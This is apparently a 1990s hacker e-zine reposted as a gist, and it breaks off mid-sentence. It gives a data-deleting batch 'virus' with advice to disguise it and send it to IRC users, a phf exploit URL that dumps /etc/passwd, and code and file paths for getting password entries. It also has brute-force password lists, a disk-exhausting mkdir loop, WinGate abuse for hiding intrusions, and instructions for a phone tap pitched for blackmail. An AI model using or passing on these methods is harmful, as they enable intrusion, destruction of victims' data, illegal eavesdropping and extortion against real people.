Skip to content

Instantly share code, notes, and snippets.

@rvrsh3ll

rvrsh3ll/krack_zine.txt

Created October 31, 2022 12:07
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save rvrsh3ll/7ec1d54eb31b6b744df5b2f9c83d79be to your computer and use it in GitHub Desktop.
Save rvrsh3ll/7ec1d54eb31b6b744df5b2f9c83d79be to your computer and use it in GitHub Desktop.
Download ZIP
Raw
krack_zine.txt
KK KK RRRRRRR AAA CCCCCCCCCC KK KK
KK KK RR R AA AA CC KK KK
KKKKKKK RRRRRRR AA AA CC KKKKKKK
KK KK RR RR AAAAAAAAA CC KK KK
KK KK RR RR AA AA CC KK KK
KK KK OO RR RR OO AA AA OO CCCCCCCCCCC OO KK KK OO

||==--Killer Ride And Chilling Kraftwork--==||
--------------------------------------------------------------------------

--------------------------------------------------------------------------
Disclaimer:
We the writers, and or members of K.R.A.C.K. Claim no responsibilty for the
use of this material. It is intended for educational, and inspirational...
psyke, just messing, no seriously, we do not recomend that you use any of
this material, it may lessen your ammount of time in the "free world"
considerably. So watch out.
--------------------------------------------------------------------------

--------------------------------------------------------------------------
Index:
- Intro
- Hacking
- Hacking II
- Hacking III
- Phreaking
- Kracking
- Anonomizer
- Unix Hacking
- IP-Spoofing
- Info for beginning Unix Hackers
- Messin with tha president!
- Tips From Sygma
- List of members
- Closing notes
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Intro:
WEEEEEEEEEEEEEEEEEERRRRRRRREEEEEEEEEEEEE BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCKK
DID YOU MISS US???
Yup thats right, K.R.A.C.K. is coming back full strength, and more. All new
members, all new webpages, all new ideas. First let me fill you in on our
new policy.
DESCRIPTION OF THE NEW KRACK:
The New Krack is the reviving of the old Krack with the intention to
give the publice a realistic perception of "real" hackers. And not what the
media has made us out to be. However, we will not be centered around hacking
we will also program, trade warez, and other interesting things. This org.
will be for the motivated only, unless you fit this description, dont even
think about it.
EXPECTATIONS OF ALL MEMBERS:
All members are expected to contribute to KRACK... Which means writing at
least one text for the e-zine a month, AND/OR in the case of a *special*
membership agreement you must obide by that special agreement. Failure to
do this will result in probation and possible banning from this organization.
These standards may seem harsh but we plan to have a long lasting, strong,
organization, and to do so we cant tolerate slackers.
FUTURE PLANS:
Our future plans include the following: a newsletter that will be put
out monthly, a 1-800 # bbs, a new irc server, possibly a convention this
summer, and maybe a ftp and telnet site.
That About sums up the NEW COMPLETELY REVISED K.R.A.C.K
-NeTDeViL DocKooL
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Hacking:
********************************************
* Popper Exploit : By DocKool of K.R.A.C.K *
********************************************
************
* About *
************
This file will explain to you how to root owned files on shells using the
popper daemon. If you do not have a shell login on systems that have
var/spool/mail mode 'drwsrwxrwt' then please dont try whats in this text
cause it wont work. This file may be a little too technical for most
beginner's, but im not good at explaining things so dont bitch at me!
**************
* What to do *
**************
#line 59 of pop_dropcopy.c:
# currently running as root: (POP_TMPDROP is /usr/spool/mail/tmpXXXXXX)
> strcpy(template,POP_TMPDROP);
> (void) mktemp(template);
# Now you begin
# If a user guesses the pathname in "template", they probably made a link to
# /etc/nologin, instead of using a script to exploit this bug you can verify # wether it exists or not by adding sleep(30) here -- after the mktemp().
# Obviously you need root to accomplish this task...
> if ( (tf=fopen(template,"w+")) == NULL ) { /* failure, bail out */
> pop_log(p,POP_PRIORITY,
> "Unable to create temporary temporary maildrop '%s': %s",template,
> (errno < sys_nerr) ? sys_errlist[errno] : "") ;
> return pop_msg(p,POP_FAILURE,
> "System error, can't create temporary file.");
> }
# Right about here the file was probably created.
> /* Now give this file to the user */
> (void) chown(template,pwp->pw_uid, pwp->pw_gid);]
> (void) chmod(template,0600);
> /* Now link this file to the temporary maildrop. If this fails it
> * is probably because the temporary maildrop already exists. If so,
> * this is ok. We can just go on our way, because by the time we try
> * to write into the file we will be running as the user.
> */
> (void) link(template,p->temp_drop);
> (void) fclose(tf);
> (void) unlink(template);
> /* Now we run as the user. */
> (void) setuid(pwp->pw_uid);
> (void) setgid(pwp->pw_gid);
**********
* Note *
**********
If your /var/spool/mail is mode 'drwsrwxrwt' this code isn't necessary.
Remove lines 59-82 of pop_dropcopy.c. This doesn't entirely solve the
problem, especially if root reads their mail via popper. The best solution
is to not have /var/spool/mail with world write permissions, as this same type
of problem exists in atleast one delivery agent (/bin/mail), and probably in
user agents.
~~~~Added By DocKool~~~~
--------------------------------------------------------------------------

--------------------------------------------------------------------------
Hacking II:
BlueRains WinGate Page
(ready to hack without being caught?)
[Hide your IP trail]
Another discovery by the BR Networking Team
---------------------------------------------------------------------------
What is WinGate?
WinGate is a like Proxy / Gateway server. It allows many Windows based PC's
to connect to the internet all at once, using just one dial up or permanent
connection with few limitations over that of a single PC with an internet
link.
Goto the WinGate home page if you want to learn more about WinGate or
download it (highly suggested).
---------------------------------------------------------------------------
What can WinGate do for me?
WinGate has a major flaw with its default installation. It allows you to
hide your IP address, by routeing whatever you are doing through someone
else's machine running WinGate.
Basically... a lame hackers way of IP Spoofing (but it works!!!). And the
best part is... WinGate keeps NO logs!!! So they (the site you route
through) dont even know you are doing it unless they are watching (highly
unlikely). And even then, they may not even realise what is happening. And
even then, they have NO way to prove you did it!!!
---------------------------------------------------------------------------
What can I do through WinGate?
You route through Wingate, by connecting to the persons machine running
Wingate.
Netscape, IE both allow you to point your browser to route through another
machine (like one running Wingate). You can route FTP and HTTP through
Netscape and IE through a machine running WinGate.
See the "Options/Network Preferences/Proxies/Manual Proxy Configuration"
option for Netscape.
See the "View/Options/Proxy Server/Settings" option for Internet Explorer.
To Telnet though a WinGate machine, just telnet to the machine running
WinGate, and you will be greeted with this prompt 'WinGate>'
Then just type 'x.x.x.x yyyy' or 'zzzzzzz yyyy' or 'zzzzzzzz' or 'x.x.x.x'
where x.x.x.x is the machine you want to logon to's ip number, zzzzzzzz is
its DNS name and yyyy is the port you wish to connect to. ie: '193.25.41.3
25' will take you to the machine at 193.25.41.3 at port 25 and
'www.microsoft.com 21' will take you to microsoft at port 21 (ftp port).
---------------------------------------------------------------------------
What ports can I route through, via a WinGate machine?
Default Wingate installation ports:
21 FTP
23 Telnet
80 WWW
110 POP3
1080 SOCKS4
1090 RealAudio
---------------------------------------------------------------------------
How does this hide my IP address?
There are 3 machines involved when you want to hack a site and hide your ip
via Wingate.
Your machine (me.isp.com), the machine running WinGate you are going to
route to (wingate.dummy.com), and the machine you want to hack
(www.nasa.gov).
Now, if you route through the wingate.dummy.com, it will look like
wingate.dummy.com is the machine that is connected to www.nasa.gov. So
www.nasa.gov's logs will show up a connection from wingate.dummy.com and
not from me.isp.com.
The reason this happens, is the wingate.dummy.com site, has a few pc's,
which all connect out of their local lan, via their wingate.dummy.com
machine (through Wingate) and out onto the net. Now, you are connecting to
their WinGate machine just like the machines on their local network
(*.dummy.com).
So you come into wingate.dummy.com from the internet, not their local
network, and then go back out onto the net, as the machines on their local
network do. This is because, WinGate does not stop machines coming in and
going back out from the internet. Nice design flaw.
---------------------------------------------------------------------------
Common questions
Q. Does WinGate have to be running on my machine?
A. No, you are using the copy of WinGate running on someone elses machine
(on the internet) to hide your IP address from the site you want to hack,
so it looks like you are coming from the site running WinGate.
Q. Can I be traced when I connect to someones machine running WinGate?
A. Your IP address will show up in one window on WinGate (download WinGate
to see) machine, but it is not logged, and the site running WinGate cannot
tell what you are connecting to from them.
Q. Does this work for all versions of WinGate?
A. Currently YES. But version 2 of WinGate is due out soon, which will
incorporate logging and access controls. Thus, sites running version 2 will
be useless to hide your tracks.
Q. Does WinGate run on Win 3.1 / Win 95 / Win NT
A. Yes.
Q. How do I find a machine running WinGate to route though?
A. Thats up to you to figure out... happy hunting
Q. I want to use WinGate for my own lan, is this safe?
A. No, it is not safe. Rather use Microsofts Proxy Server (much better than
WinGate, but still in beta, but it does provide better net connection,
logging and access controls. Requires Windows NT 4).
Q. Is there a registration crack out for Wingate?
A. Yes, it works for most versions. Download it here: WinGate Crack
---------------------------------------------------------------------------
So what now?
Well, now its time for you to go out and find machines running Wingate...
and begin hiding your ip trail...
---------------------------------------------------------------------------
Contact: BlueRain
Contact: BlueRain
(c) 1996 - BR Networking Team [Powered by MicroSoft BackOffice]
~~~~Added By BlueRain~~~~
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Hacking III:
*****************************
* How to make a Batch Virus *
* By DocKool *
* & *
* NeTDeViL *
*****************************
K.R.A.C.K. Killer Ride And Chilling Kraftwork
Ok, In this text we will explain to you how to make a virus, like a trojan
horse, in a Batch file. Its quite easy... If you know anything about the
DOS commands (I hope for your sake you do). Anyways back to the virus.
First open up Notepad.exe or use dos's very handy editor (or any other
text editor you have), next do the following; (any line beginning with
a * is us)
ECHO OFF
*this stops the user from seeing what the batch file is doing
CD\
*This will bring the virus to DOS and into the defualt drive.
ECHO Y | del c:\test\*.*
*This will delete all files in the test directory.
It will not delete the sub directories in the test directory!
So then you must ad a line like this;
ECHO Y | del c:\test\sub\*.*
*That will delete all the files in the test\sub directory now,
you can imagine the possibilities, of all the directories you could delete.
For instance if you wanted, you could make a Winblows, mIRC, or Netscape
virus, that would say;
ECHO Y | del c:\netscape\*.*
*You get the picture? Next you will want to add something like this;
ECHO HAHA YOU LOOZER I FUCKED YOU UP YOU SUNUVABITCH
* this will display HAHA YOU LOOZER.... in dos and the user will be wondering
what the hell your talkin about.
*Now save your file to .bat (virus.bat). After that you want to obtain a
program called bat2exec.com this program will turn your .bat file into
an .exe we will have one available from the krack web site.
*When all done, you can play around with it a little, make a virus,
and save it as porno.exe, then go in the porno channels on IRC and
send it to some horny lamer. Or make a zip file and put your virus
in with a name like install.exe, also put some other garbage files
in there so the zip will apear bigger. Next go in some warez channel
and claim that the zip is a great game. The possibilities are endless,
just use your imagination. (this works really well in channelst with
fserve available so you can plan each and every directory. :)
*The following is an example virus that would kill a directory called c:\test
ECHO OFF
CD\
ECHO Y | del c:\test\*.*
ECHO Y
cls
echo. I just fucked up your test directory!!!
echo. Dont you feel dumb???
*Try making some virus's like this and set them up to delete directories you
dont care about, like c:\test\ Thats the best way ive found to troubleshoot
your virus. Good luck!!!
USAGE:
The posibilities for this are limitless, and any moron can do it. If you
could get a bat file that will reboot the cpu, and give it to somebody on
irc, you could take their channel. You could get it to copy a bullatin
boards password file into the download forum, and then pop in and download
it, you could get this thing to do about anything.
By the way, if you do come up with a way to get the bat file to reboot
the system, please email us, or if you have any updates to this file,
email us. (email addresses listed below)
~~~~Added By DocKool & NeTDeViL~~~~
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Phreaking:
DeViLBoX
^^^^^^^CReaTeD By NeTDeViL^^^^^^^
Brought to you by K.R.A.C.K
Da K-Rad Hack Society

Disclaimer
This box was written for entertainment, and educational purposes
only. I do not recomend you use any of this information. And i
claim no responsibilty for your actions. Neither does K.R.A.C.K
or any of its members. So dont be a moron and use this info wisely.
What you need
A phone you can "Modify"
A walkman with recording capabilites
headphones
some copper wire
some electric tape
an electric switch
Purpose
Yes i know this box is a lot like others youve read, but it uses some
concepts from other boxes, with my own little satanic twist. So read and
enjoy.
First you need to read the beige box and modify your phone acordingly. when
thats done then complete the following instrucions and you will have your
devil box.
What a DevilBox does
well the devil box taps phones without a trace. Normally when tapping a phone
you can be heard on both ends because your phone reduces the ammount of
voltage running thru the line. Also you will be able to record the phone
conversations for blackmailing.
How To
ok now youve got your beige box and your ready for the devil box. first
things first. we need to fix the phone with a mute switch. what you need
to do is open the reciever of your phone, and locate the microphone. there
should be two wires connecting microphone to the board. Cut one of these in
half, then strip the wire on both ends. use the electric tape to bond the
half of the wire that is connected to the microphone to a 3 inch piece of
copper wire. then connectthe other end of the copper wire to the electric
switch, and the half of the wire that is connected to the board should be
connected to the other side of the electric switch. Now you should have a
mute switch. Now when the switch is open and you pick up the phone it should
cause 0 resistance, making you untracable.
heres the diagram
switch
|
| |-------------------|
| | |
microphone |||------o/o-------------|- |
|||----------------------|- |
^ |___________________|
|
|
2 wires connecting mike to board
now you need to locate the speaker in the reciever
there should be 2 wires leading into this too. Snip these 2 wires in half
at this point you can throw away the speaker you wont need it. Then strip
both of the wires still connecting to the board. Add copper extensions to
these wires. now open up your walkman. There should be two wires leading
from the spot where you can insert a mircrophone. Snip these and connect
the copper extensions to the halves of the wires that connect to the green
board. now plug in your headphones. now with the switch closed you should be
able to hear yourself talking into the phone through the headphones. and with
the switch up you shouldnt be able to hear yourself, just the dialtone. if
so youve correctly constructed the devil box. Now just insert a tape and when
you eavsdrop you can record it. Congradulations.
Possible uses
If you are bothering to read this section your an idiot, its obvious what
you use this box for.
~~~~Added By NeTDeViL~~~~
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Kracking:
---------------------------------------------------------------------------

---------------------------------------------------------------------------
ANONOMIZER:
You may have seen numerous advertisements on the net for a security web site
called Anonymizer(http://www.anonymizer.com). The web page claims to hide
your IP trail, to fool the logs. At first glance, every hacker in the world
thought, "YES!! NO MORE TELNET BOUNCING!!!", but alas, it isn't as secure as
it seems. The whole idea behind Anonymizer is a CGI script that basically
telnet bounces, but through the World Wide Web port. It has the same
principles, but the WWW port is set up different than the telnet, so it has
faults. I was recently privied to an IP log of a major server(to remain
nameless) and you could easily pick out the Anonymizer users. The truth is,
Anonymizer leaves an IP trail the size of the Great Wall of China, all ending
with your original IP. Anonymizer is good to fool those java applets that
show who you are, but not much else. So before you go and try to use it,
think to yourself, "Do I want my IP on the logs?" If you don't care, be my
guest and use it. But if you are gonna try something nasty, be careful.
-=-_-=disLeXiC=-_-=-
~~~Added By disLeXiC~~~~
---------------------------------------------------------------------------

---------------------------------------------------------------------------
UNIX HACKING:
* What is KRACK? *
we are the true 'cyberkings'
the owners of the world
the elite of the elite
the Bill clintons of the net
we will choose our destiny
and the nets destiny
because we are hackers
We Are KRACK!
--------------------------------------------------------------------------------
Stradegie For Getting Root With a shadowed Passwd
step#1
anonymous ftp into the server get passwd
step #2
To defeat password shadowing on many (but not all) systems, write a
program that uses successive calls to getpwent() to obtain the
password file.
Example:
#include <pwd.h>
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name,
p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir,
p->pw_shell);
}
Or u can Look for the Unshadowed Backup.....
Unix Path needed Token
----------------------------------------------------------------------
AIX 3 /etc/security/passwd !
or /tcb/auth/files/<first letter #
of username>/<username>
A/UX 3.0s /tcb/files/auth/?/ *
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files/<first letter *
of username>/<username>
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow
<optional NIS+ private secure
maps/tables/whatever>
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb
Step #3
crack it
step #4
login and type this
/usr/local/bin/suidperl
chmod 4700 schperl.pl
now we have root perms...!!!!!!!!!!!!!!!
=======================================
C-ya everyone hope u ENjoy,
OD^PHREAK
~~~~Added By OD^PHREAK~~~~
---------------------------------------------------------------------------

---------------------------------------------------------------------------
IP-Spoofing:
"WHAT IS SPOOFING" IN LAMENS TERMS- By NeTDeViL
=============================================
Now I know most of us already know this one, but if you sit in #hackteach
on undernet long enough, your chances of seein some lamer come in and ask
about an IP-Spoofer are pretty high. So if you want to know what this is
SHUTUP AND READ DAMNIT!
SPOOFING- An attempt to gain access to a system by posing as an authorized
user.
Now for a more detailed explenation.
Say Joe@some.domain.com wants to log into ftp.lamers.org and download their
password file. He couldnt do this under normal conditions (unless using a
hacked shell) because they would simply check their logs and see who it was.
Now Joe dont wanna get caught so he loads up is IP-Spoofer, and it changes
his ip address to Hacker@some.domain.com. Now even his ISP thinks he is
hacker@some.domain.com. So now he goes to ftp.lamers.org and downloads their
passwd file. Then disconnects. and cracks the file. Meanwhile lamers.org is
sitting here looking through their logs at whodunnit. up comes
hacker@some.domain.com. they call some.domain.com up, and they dont know who
it was either, since most likely there wont be a hacker@some.domain.com so
joe is sittin high and dry so to speak.
Q.) Do IP-Spoofers really exist?
A.) Yes, but only for systems that use a Unix based OS. The reason for
this is when you try to run a spoofer, it closes winsock.dll. And your not
connected anymore, so it doesnt work. But they come for most unix based
systems.
---------------------------------------------------------------------------
Q.) How do i find a spoofer?
A.) The web sure comes in handy sometimes...
i just love those search engines.
Our page is wrather interesting too, i think im gonna upload
some software to it pretty soon.
One place i found with a GOOD IP Spoofer that actually Works is at...
HTTP://ww2.succeed.net/~coder
~~~~Added By NeTDeViL~~~~
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Info for beginning Unix Hackers:
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
|
|
|
|
| So You Wanna Be a HACKER?
|
|
| By Defiant
| Member of K.R.A.C.K
|++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Purpose of this file:
To inform those of you out there that "think" your hackers what a true
hacker is and how to be one. And to inform those of you who want to be a
hacker why you should or shouldn't be one depending on what your views are
of a hacker. But basically its an absolute beginners guide to hacking.
Contents:
Section 1 Why do you want to be a hacker?
Section 2 What do you think a hacker is?
Section 3 Read this manifesto!
Section 4 What you need to start on your quest
Section 5 Lets get started!
Section 6 Navigating Unix
*********************************************************************
S E C T I O N 1
Why do you want to be a hacker?
Before you get started ask yourself why you want to pursue the art of
hacking. Are curious about whats out there? Do you want to cause havok?
Revenge? To Learn?
If your goal is to crash a system or steal something (unless its information
that should be free!) then stop right now and read the manifesto in section 3.
If your goal is to uncover information, learn, or your just curious about the
possiblilities of the internet and its intriquit networks and varieties of systems,
then you are ready to learn this sacred art!
*********************************************************************
S E C T I O N 2
What do you think a Hacker is?
Now that you know why you want to be a hacker you need to know what a
TRUE hacker really is.
There are those who think they are hackers and those who ARE hackers.
Those who think they are, are the criminals who waste precious time to steal
card #'s, crack games, mail bomb someone (now that is lame), or just trash
a system. They are the TRUE LAMERZ. The true hacker is in a pursuit to
fulfill his curiosity or to gain knowlege that others do not possess
(or knowledge that SHOULD be free) and once you have knowlege you have power!
Which i just now realized is probably most hackers real purpose, to feel power
over someone or some system. Glad i'm writing this file because even I am
learning as I write this. Here are some rules to use when you become a hacker:
1. Never damage any system. This will only get you into trouble.
2. Never alter any of the systems files, except for those needed to
insure that you are not detected, and those to insure that you have
access into that computer in the future.
3. Do not share any information about your hacking projects with
anyone but those you'd trust with your life.
4. When posting on BBS's (Bulletin Board Systems) be as vague as
possible when describing your current hacking projects. BBS's CAN
be monitered by law enforcement.
5. Never use anyone's real name or real phone number when posting
on a BBS.
6. Never leave your handle on any systems that you hack in to.
7. DO NOT hack government computers.
8. Never speak about hacking projects over your home telephone line.
9. Keep all of your hacking materials in a safe place.
10. To become a real hacker, you have to hack. You can't just sit
around reading text files and hanging out on BBS's. This is not what
hacking is all about.
*************************************************************************
S E C T I O N 3
Read this manifesto
I think EVERYONE should read this manifesto by the MENTOR.
THE CONCIENCE OF A HACKER
BY THE MENTOR
Another one got caught today, it's all over the papers. "Teenager
Arrested in Computer Crime Scandal", "Hacker Arrested after Bank
Tampering"... Damn kids. They're all alike. But did you, in your three-
piece psychology and 1950's technobrain, ever take a look behind the
eyes of the hacker? Did you ever wonder what made him tick, what forces
shaped him, what may have molded him? I am a hacker, enter my world...
Mine is a world that begins with school... I'm smarter than most of the
other kids, this crap they teach us bores me... Damn underachiever.
They're all alike. I'm in junior high or high school. I've listened to
teachers explain for the fifteenth time how to reduce a fraction.
I understand it. "No, Ms. Smith, I didn't show my work. I did it in
my head..." Damn kid. Probably copied it. They're all alike.
I made a discovery today. I found a computer. Wait a second, this is
cool. It does what I want it to. If it makes a mistake, it's because I
screwed it up. Not because it doesn't like me... Or feels threatened by
me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be
here... Damn kid. All he does is play games. They're all alike. And then
it happened... a door opened to a world... rushing through the phone line
like heroin through an addict's veins, an electronic pulse is sent out,
a refuge from the day-to-day incompetencies is sought... a board is found.
"This is it... this is where I belong..." I know everyone here... even
if I've never met them, never talked to them, may never hear from them
again... I know you all... Damn kid. Tying up the phone line again.
They're all alike... You bet your ass we're all alike... we've been
spoon-fed baby food at school when we hungered for steak... the bits of
meat that you did let slip through were pre-chewed and tasteless.
We've been dominated by sadists, or ignored by the apathetic. The few
that had something to teach found us willing pupils, but those few are
like drops of water in the desert.
This is our world now... the world of the electron and the switch, the
beauty of the baud. We make use of a service already existing without
paying for what could be dirt-cheap if it wasn't run by profiteering
gluttons, and you call us criminals. We explore... and you call us
criminals. We seek after knowledge... and you call us criminals. We
exist without skin color, without nationality, without religious bias...
and you call us criminals. You build atomic bombs, you wage wars, you
murder, cheat, and lie to us and try to make us believe it's for our
own good, yet we're the criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never
forgive me for. I am a hacker, and this is my manifesto. You may stop
this individual, but you can't stop us all... after all, we're all alike.
The Mentor
*************************************************************************
S E C T I O N 4
What you need to start hacking.
Text files. You need to read as many text files as you can get a hold of.
I have loads at http://www.elkhart.net/~sborosh/hacking/text/info.html
Programs:
You need a Telnet application to remotely log into another system.
If you are using win95 you have one already. Just go to the start menu and
then to run and in the box type telnet and click ok. If not go to
http://www.elkhart.net/~sborosh/hacking/filez/qvt.zip to get one.
To transfer files you need an ftp (File Transfer Protocol) program.
Again windows 95 comes with one. But i recommend Cuteftp just search for it
with webcrawler or something.
Those are the two main programs you need to navigate your way into systems.
MORE FILEZ:
Once you get into these systems there are some programs you can run and some
exploits (an exploit is a hole in the security which allows you to gain access)
I have loads of filez at www.elkhart.net/~sborosh/hacking/filez/filez.html
I will explain how to use some of them later in this phile.
**************************************************************************
S E C T I O N 5
Getting started on your journey into the unknown!
Ok now that you have the files to do so lets learn how to hack.
Before you can actually hack a system you need to know the type of system
you are dealing with. The most common system you will run into is UNIX
or a unix compatible server. There are many different types of UNIX. They
are CPIX,Berkeley Ver 4.1,Berkeley 4.2,FOS,Genix,HP-UX,
IS/I,OSx,PC-IX,PERPOS, Sys3, Ultrix, Zeus, Xenix, UNITY, VENIX,UTS,Unisys,
Uniplus+, UNOS,Idris,QNIX,Coherent,Cromix,System III,System 7,Sixth edition,
and most recently LINUX. But don't worry they use most of the same commands.
You won't need to learn 100's of commands for each system! Some other systems
there are but I won't get into much because you are just beginning are VAX,
DEC,PRIME and there are many more.
Now you need to find a system to hack. If you know of any cheezy
colleges around or even a big one that you would like to hack an account on
they are the easiest to hack into for your first hack. This bug i am going
to show is is called the phf bug it can still be used in some places. But
no thanks to 2600 magazine the phf bug was let out to the public and many
administrators have locked the bug out. Here is how it works:
Find a computer you want to hack I.E www.hackland.com
Open your browser and type
www.hackland.com/cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd
If it says phf not found on system then you are out of luck but if you get
Query Results then you might have a chance of getting the passwd file.
If the passwd file came on your screen save it to a directory as passwd
Then run a cracker program such as cracker jack , or the newly released
john cracker on the passwd file. You can find a password crack on my site
at www.elkhart.net/~sborosh/hacking/filez/filez/html
If you get query results and no file then their passwd file is under a different
name. Here are the names of the passwd files on certain systems. Use the same
command just after cat%20 put the new directory and filename ie /etc/shadow
UNIX System Type: Path: Token:
AIX 3 /etc/security/passwd !
or /tcb/auth/files/<first letter of #
username>/<username>
A/UX 3.Os /tcb/files/auth/*
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
Convex0S 11 /etc/shadow *
DG/UX /etc/tcb/aa/user *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO UNIX #.2.x /tcb/auth/files/<first letter of *
username>/<username>
SunOS 4.1+c2 /etc/security/passwd.adjunct ##
SunOS 5.0 /etc/shadow
System V 4.0 /etc/shadow x
System V 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *
Now if the phf bug doesnt work i always ask around to see if anyone I know
has a shell account on that system i could use. A shell account is a user
account that allows access to filez and programs. But if you dont know
anyone with a shell account on the system it is time to brute hack.
Brute hacking is just guessing the password until you get in. Yes this can
be boring so crank up your music and turn on the tv. If you have a shell
account on another system log into as many accounts as you can before you
log into the system you want to hack to hide where you are coming from.
So it would look something like this:
your isp ----telnet to-> shell #1 ------->shell#2------>the comp you want to hack.
If you have a shell and dont know what to type to telnet to another computer
all you have to type is telnet then you will get the prompt
telnet> type open and you will get the prompt to> then type the address
of the site you want to hack.
If phf doesn't work you'll most likely have to resort to Brute Force Hacking.
To brute hack you must have a lot of pacience because it could take a
long time.
Brute Force Hacking Described by members of LOD
~~~~~~~~~~~~~~~~~~~
There will also be many occasions when the default passwords will not work
on an account. At this point, you can either go onto the next system on your
list, or you can try to 'brute-force' your way in by trying a large database
of passwords on that one account. Be careful, though! This works fine on
systems that don't keep track of invalid logins, but on a system like a VMS,
someone is going to have a heart attack if they come back and see '600 Bad
Login Attempts Since Last Session' on their account. There are also some
operating systems that disconnect after 'x' number of invalid login attempts
and refuse to allow any more attempts for one hour, or ten minutes, or some-
times until the next day.
The following list is taken from my own password database plus the data-
base of passwords that was used in the Internet UNIX Worm that was running
around in November of 1988. For a shorter group, try first names, computer
terms, and obvious things like 'secret', 'password', 'open', and the name
of the account. Also try the name of the company that owns the computer
system (if known), the company initials, and things relating to the products
the company makes or deals with.
Anyway here are some common passwords to use when brute hacking:
These are super user accounts.
Login: Password:
root root
root system
sys sys
sys system
daemon daemon
uucp uucp
tty tty
test test
unix unix
unix test
bin bin
adm adm
adm admin
admin adm
admin admin
sysman sysman
sysman sys
sysman system
sysadmin sysadmin
sysadmin sys
sysadmin system
sysadmin admin
sysadmin adm
who who
learn learn
uuhost uuhost
guest guest
host host
nuucp nuucp
rje rje
games games
games player
sysop sysop
root sysop
demo demo
Or if it is a users account guess these passwords:
The password list was taken from A Novice's Guide To Hacking, by The Legion Of
Doom, and from some of my own discoveries. Here is the list of commonly used passwords:
Password:
aaa
academia
ada
adrian
aerobics
airplane
albany
albatross
albert
alex
alexander
algebra
alias
alisa
alpha
alphabet
ama
amy
analog
anchor
andy
andrea
animal
answer
anything
arrow
arthur
ass
asshole
athena
atmosphere
bacchus
badass
bailey
banana
bandit
banks
bass
batman
beautiful
beauty
beaver
daniel
danny
dave
deb
debbie
deborah
december
desire
desperate
develop
diet
digital
discovery
disney
dog
drought
duncan
easy
eatme
edges
edwin
egghead
eileen
einstein
elephant
elizabeth
ellen
emerald
engine
engineer
enterprise
enzyme
euclid
evelyn
extension
fairway
felicia
fender
finite
format
god
hello
idiot
jester
john
johnny
joseph
joshua
judith
juggle
julia
kathleen
kermit
kernel
knight
lambda
larry
lazarus
lee
leroy
lewis
light
lisa
louis
love
lynne
mac
macintosh
mack
maggot
magic
malcolm
mark
markus
martin
marty
marvin
matt
master
maurice
maximum
merlin
mets
michael
michelle
mike
minimum
nicki
nicole
rascal
really
rebecca
remote
rick
reagan
robot
robotics
rolex
ronald
rose
rosebud
rosemary
roses
ruben
rules
ruth
sal
saxon
scheme
scott
secret
sensor
serenity
sex
shark
sharon
shit
shiva
shuttle
simon
simple
singer
single
singing
smile
smooch
smother
snatch
snoopy
soap
socrates
spit
spring
subway
success
summer
super
support
surfer
suzanne
tangerine
tape
target
taylor
telephone
temptation
tiger
tigger
toggle
tomato
toyota
trivial
unhappy
unicorn
unknown
urchin
utility
vicki
virgin
virginia
warren
water
weenie
whatnot
whitney
will
william
winston
willie
wizard
wonbat
yosemite
zap
Once you have gotton in you need to get the passwd file. Type
etc/passwd
or
cat /etc/passwd
or
ypcat passwd
Depending on what system you are in.
Once you get the passwd file this is what it looks like and means.
john:234abc56:9999:13:John Johnson:/home/dir/john:/bin/john
Broken down, this is what the above password file states:
Username: john
Encrypted Password: 234abc56
User Number: 9999
Group Number: 13
Other Information: John Johnson
Home Directory: /home/dir/john
Shell: /bin/john
But if you get a passwd file that is shadowed you will see
john:*:9999:13:John Johnson:/home/dir/john:/bin/john
If you get this copying the passwd file wont help. The unshadowed passwd
file is usually /etc/shadow but you probably dont have permission to get it
unless you have a super user account.
If it is shadowed and you still want to pursue a superuser account try running
some source code which you can find at www.elkhart.net/~sborosh/hacking/filez/filez.html
************************************************************************************************************
S E C T I O N 6
Navigating Unix
In this section I am going to give you some useful commands for navigating and using unix.
First off there is the who command which tells you who is on the system you are in.
Here is how to use the who command:
who -b Displays time sys as last booted.
who -H Precedes output with header.
who -l Lists lines waiting for users to logon.
who -q displays number of users logged on.
who -t displays time sys clock was last changed.
who -T displays the state field (a + indicates it is possible to send to terminal, a - means u cannot)
who -u Give a complete listing of those logged on.
who -HTu is the best choice
talk <username> allows you to chat with another user
write <username> writes e-mail to that user.
ls lists files in your current directory
du -a Checks the amount of memory you have, or disk space
cd\name (name is the name of the sub-directory you choose)
cd\ (brings your home directory to current use)
help brings up some commands you can use
man <command> gives you all options on using that command
This next command will create havok on a system
while : ; do
mkdir x
cd x
done
Either a panic will occur because all the i-nodes on the device are used up,
or all the disk blocks will be consumed, thus preventing anyone from writing
files on the device.I
-----------------------------------------------------------------------------
This next section was provided by CarbonBoy
When a users state field (see -T flag option for who
command) says that a user has their message function on, this
